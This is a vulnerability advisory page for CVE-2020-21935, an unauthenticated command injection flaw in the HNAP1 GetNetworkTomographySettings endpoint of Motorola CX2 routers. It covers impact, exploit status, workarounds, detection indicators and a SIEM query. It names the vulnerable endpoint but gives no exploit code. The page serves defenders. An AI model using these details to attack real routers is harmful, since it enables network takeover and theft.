Login Sign Up

CVE-2020-21935

9.8 CRITICAL
Remote Code Execution

📋 TL;DR

This CVE describes a command injection vulnerability in the HNAP1/GetNetworkTomographySettings endpoint of Motorola CX2 routers. Attackers can exploit this to execute arbitrary code with high privileges. Users of affected Motorola CX2 router versions are at risk.

💻 Affected Systems

Products:
  • Motorola CX2 router
Versions: CX 1.0.2 Build 20190508 Rel.97360n
Operating Systems: Embedded Linux
Default Config Vulnerable: ⚠️ Yes
Notes: Affects the HNAP1 protocol implementation specifically in the GetNetworkTomographySettings endpoint.

📦 What is this software?

Cx2 Firmware by Motorola

View all CVEs affecting Cx2 Firmware →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete compromise of the router allowing attackers to intercept traffic, modify configurations, install persistent backdoors, and pivot to internal networks.

🟠

Likely Case

Router takeover leading to DNS hijacking, credential theft from connected devices, and network disruption.

🟢

If Mitigated

Limited impact if router is behind firewall with restricted WAN access and strong authentication.

🌐 Internet-Facing: HIGH - Routers are typically internet-facing devices directly accessible from WAN interfaces.
🏢 Internal Only: MEDIUM - Internal attackers could exploit if they gain network access, though external exploitation is more likely.

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Public exploit code exists in GitHub repositories, making exploitation straightforward for attackers with network access.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Unknown

Vendor Advisory: No official vendor advisory found

Restart Required: No

Instructions:

No official patch available. Consider upgrading to newer router models or implementing workarounds.

🔧 Temporary Workarounds

Disable HNAP1 protocol

all

Disable the HNAP1 protocol on the router if not required for functionality

Network segmentation

all

Place router in isolated network segment with strict firewall rules

🧯 If You Can't Patch

  • Replace affected router with newer model that doesn't have this vulnerability
  • Implement strict network access controls to limit exposure to the router's management interface

🔍 How to Verify

Check if Vulnerable:

Check router firmware version via web interface or SSH. If version is CX 1.0.2 Build 20190508 Rel.97360n, it is vulnerable.

Check Version:

Check router web interface at http://[router-ip]/ or use SSH if enabled

Verify Fix Applied:

Verify firmware has been updated to a version newer than the affected build, though no official patch exists.

📡 Detection & Monitoring

Log Indicators:

  • Unusual HNAP1 protocol requests
  • Suspicious command execution in router logs
  • Unexpected configuration changes

Network Indicators:

  • Unusual traffic to router management ports (typically 80/443)
  • Suspicious payloads in HTTP requests to HNAP1 endpoints

SIEM Query:

source="router" AND (http_uri="*HNAP1*" OR http_uri="*GetNetworkTomographySettings*") AND http_method="POST"

📊 Metadata

CVE ID: CVE-2020-21935
CVSS v3 Score: 9.8 (CRITICAL)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-78
Published: July 21, 2021
Last Updated: November 21, 2024

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2020-21935, you might also want to check these:

CVE-2023-2564 10.0

This CVE describes an OS command injection vulnerability in scanservjs web scanning software that al...

Same vulnerability type (CWE-78)
CVE-2024-58338 10.0

Anevia Flamingo XL 3.2.9 contains a restricted shell escape vulnerability that allows remote attacke...

Same vulnerability type (CWE-78)
CVE-2025-26389 10.0

This critical vulnerability allows unauthenticated remote attackers to execute arbitrary code with r...

Same vulnerability type (CWE-78)